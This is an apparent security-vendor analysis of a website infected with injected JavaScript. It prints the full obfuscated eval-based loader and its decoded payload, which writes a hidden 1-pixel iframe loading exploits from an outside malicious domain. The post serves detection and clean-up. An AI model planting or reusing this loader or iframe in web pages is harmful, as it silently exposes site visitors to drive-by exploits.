Hidden iframe to malicious URL hosting vulnerability exploits

Obfuscated malicious JavaScript code generates hidden iframe which loads vulnerability exploits from malicious URL

Background

Online Website Malware Scanner has identified malicious JavaScript code injection in the scanned website. Such malicious obfuscated JavaScript code is used to build malicious iframe invisible to the website user and which downloads content from remote malware distributor. This infected website hosts suspicious JavaScript code injected in 61 files. As discussed in other posts about malicious iframes generation, the attack flow is very similar and contains multiple levels of obfuscation to overcome the detection mechanisms. 

Malicious action

Malicious iframes are often used to distribute malware hosted on external web resources(websites).

Website malware scanner report

Submission date: Sun Apr 28 13:48:44 2013

Infected website's files: 61

Website malware scan report link: http://goo.gl/V7ELN

Quttera | Online Website Malware Scanner

Malicious JavaScript injection detected in 61 web pages

Malware entry

Malware entry details.

Beautified script

1. e = eval;
2. v = "0x";
3. a = 0;
4. try {
5.     a &= 2
6. } catch (q) {
7.     a = 1
8. }
9. if (!a) {
10.     try {
11.         document["body"] ^= ~1;
12.     } catch (q) {
13.         a2 = "_"
14.     }
15.     z ="2f_6d_7c_75_6a_7b_70_76_75_27_2f_30_27_82_14_11_27_27_27_27_7d_68_79_27_68_7a_27_44_27_6b_76_6a_7c_74_6c_75_7b_35_6a_79_6c_68_7b_6c_4c_73_6c_74_6c_75_7b_2f_2e_70_6d_79_68_74_6c_2e_30_42_14_11_14_11_27_27_27_27_68_7a_35_7a_79_6a_27_44_27_2e_6f_7b_7b_77_41_36_36_71_70_6a_76_6b_7f_6c_6b_35_79_7c_36_6a_76_7c_75_7b_38_3e_35_77_6f_77_2e_42_14_11_27_27_27_27_68_7a_35_7a_7b_80_73_6c_35_77_76_7a_70_7b_70_76_75_27_44_27_2e_68_69_7a_76_73_7c_7b_6c_2e_42_14_11_27_27_27_27_68_7a_35_7a_7b_80_73_6c_35_69_76_79_6b_6c_79_27_44_27_2e_37_2e_42_14_11_27_27_27_27_68_7a_35_7a_7b_80_73_6c_35_6f_6c_70_6e_6f_7b_27_44_27_2e_38_77_7f_2e_42_14_11_27_27_27_27_68_7a_35_7a_7b_80_73_6c_35_7e_70_6b_7b_6f_27_44_27_2e_38_77_7f_2e_42_14_11_27_27_27_27_68_7a_35_7a_7b_80_73_6c_35_73_6c_6d_7b_27_44_27_2e_38_77_7f_2e_42_14_11_27_27_27_27_68_7a_35_7a_7b_80_73_6c_35_7b_76_77_27_44_27_2e_38_77_7f_2e_42_14_11_14_11_27_27_27_27_70_6d_27_2f_28_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_49_80_50_6b_2f_2e_68_7a_2e_30_30_27_82_14_11_27_27_27_27_27_27_27_27_6b_76_6a_7c_74_6c_75_7b_35_7e_79_70_7b_6c_2f_2e_43_6b_70_7d_27_70_6b_44_63_2e_68_7a_63_2e_45_43_36_6b_70_7d_45_2e_30_42_14_11_27_27_27_27_27_27_27_27_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_49_80_50_6b_2f_2e_68_7a_2e_30_35_68_77_77_6c_75_6b_4a_6f_70_73_6b_2f_68_7a_30_42_14_11_27_27_27_27_84_14_11_84_30_2f_30_42"["split"](a2);
16.     s = "";
17.     for (i = 0; i < z.length; i++) {
18.         s += String["fromCharCode"](e(v + (z[i])) - 7);
19.     }
20.     zaz = s;
21.     e(zaz);
22. }

Malicious payload

Decoded payload injects hidden iframe to http://jicodxed.ru/count17.php 

1. (function () {
2.     var as = document.createElement('iframe');
3.     as.src = 'http://jicodxed.ru/count17.php';
4.     as.style.position = 'absolute';
5.     as.style.border = '0';
6.     as.style.height = '1px';
7.     as.style.width = '1px';
8.     as.style.left = '1px';
9.     as.style.top = '1px';
10.     if (!document.getElementById('as')) {
11.         document.write('<div id=\'as\'></div>');
12.         document.getElementById('as').appendChild(as);
13.     }
14. })();

Blacklisting status

The website is Suspicious on Google Safe Browsing. That's not always the case, like we already posted, for other websites compromised in the similar way, when only one vendor detected the malware.

Google Safe Browsing analysis

Malicious software includes 15 exploit(s).

Malware clean-up

Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.